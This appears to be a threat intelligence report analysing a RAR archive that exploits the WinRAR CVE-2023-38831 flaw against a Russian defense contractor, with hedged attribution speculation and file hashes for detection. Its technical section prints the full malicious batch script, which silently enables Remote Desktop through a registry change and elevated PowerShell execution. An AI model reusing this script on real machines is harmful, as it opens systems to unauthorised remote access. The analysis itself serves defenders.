threat-analysis
Malware Targeting a Russian Defense Contractor
January 23, 2024
Findings Summary: Malware Targeting a Russian Defense Contractor
On 14 December, DeepSeas automated scanning and analysis encountered a unique piece of malware targeting a Russian defense contractor on VirusTotal. The file in question, listed as 567000-13.rar, contains a .PDF file of the same name, which was likely directed toward an engineer at a Russian defense industrial base organization and detailed a part for a nuclear weapons system. Further review determined that the sender was masquerading as the CEO of a Russian defense contractor. The part for the weapons system mentioned in the body of the .PDF was stated to be “for a strategic nuclear system,” suggesting, with the vague language given, that the creators of the malware may be a part of a hacktivist or nation-state group opposed to Russia. DeepSeas does not believe however that the sender is from Ukraine, as may be first assumed, but a country that would be more interested in Russia’s strategic arsenal. This may include nations such as China, North Korea, or Iran.
Technical Summary
The malware targeting a Russian defense contractor abuses the CVE-2023-38831 vulnerability, which is specified by the National Institute of Standards and Technology (NIST)’s National Vulnerability Database (NVD) as an arbitrary code vulnerability in RARLAB’s WinRAR in versions prior to v6.23.[i] An attack may utilize this vulnerability to hide a folder that may be full of malware within a .ZIP with the same name as the benign file within a RAR archive. When a victim tries to access the benign file with this vulnerability, the contents of the folder are processed instead. This vulnerability has a CVSS score of 7.8, ranking it relatively high in severity, though it falls short of the more serious 9.0 and higher severity rankings.
Provided the attackers were successful in tricking the victim into opening the contents of the RAR file, the victim would not notice anything unusual. However, in the background the payload would have enabled Windows’ native Remote Desktop Protocol (RDP) on the victim’s device. No other indications of malicious activity were noted; no additional payloads or tools were decoded, compiled, retrieved, dropped, installed, or executed. The only activity observed was the enabling of RDP on the affected device, making this an interesting case of a targeted attack with extremely limited goals.
DeepSeas Analysis: Malware Targeting a Russian Defense Contractor
The lack of a follow-on payload for this attack strongly suggests that the attackers were not attempting to gain initial access to their target’s network. While the possibility exists that the attackers had obtained valid credentials and merely required RDP be enabled to continue their operations, the analysts at DeepSeas consider this possibility to be slim. More likely is that the attackers were already active in their targets’ networks and required RDP be enabled to facilitate the exfiltration of sensitive data or potentially to deliver additional payloads in a more secure manner. Though this could have been done using administrator credentials, the attackers may not have had access to these credentials and operating instead with the credentials of a lower-privileged user.
Get to Know DeepSeas
Over the past several years, DeepSeas has observed several attacks against companies in the Russian defense industrial base, including companies involved in the design and construction of Russian ballistic missile submarines, government entities, manufacturers of Russian armored vehicles, and others. DeepSeas has not observed any indications that the malware overlaps with any other known nation-state group and cannot authoritatively attribute this attack to any nation or group. Previous attacks against the Russian defense industrial base were attributed to North Korean actors, proving not only that there is no honor among thieves, but that in the world of espionage everyone is a valid target. Given North Korea’s recent efforts to improve their ballistic missile technology it is entirely possible that this attack may be the work of Pyongyang, though until further information comes to light it will be difficult to provide more authoritative attribution.
Technical Details
5670001-13.pdf File Details
| <</Title<FEFF004D006F006400650072006E00200062007500730069006E0065007300730020006C00650074007400650072002000730061006E0073002D00730065007200690066>/Creator<FEFF005700720069007400650072>/Producer<FEFF004C0069006200720065004F0066006600690063006500200037002E0034>/CreationDate(D:20230908022632+03’00’)>> |
| Language: ru-RUTitle: Modern business letter sans-serifCreator: WriterProducer: LibreOffice 7.4Create Date: 2023:09:08 02:26:32+03:00 |
01.bat File Contents
| @echo offecho @echo off > %appdata%\01.batecho reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f >> %appdata%\01.batpowershell -command “Start-Process -FilePath ’01.bat’ -WorkingDirectory ‘%appdata%’ -Verb RunAs” |
Indicators of Compromise
| c23d42f6e94b05f225267c4ea3b1a08aa947c77014faf866326e08c55196c4f6 | 567000-13.rar |
| 9c5ac599b56bcda4dedd76ffa2572aca1e4e45088b851a43df39c2367ae6d6b8 | 5670001-13.pdf |
| 4a56591a32a474acd45014efd878360733901f847f0a5a2f3fe4a4c0f73491f6 | 01.bat |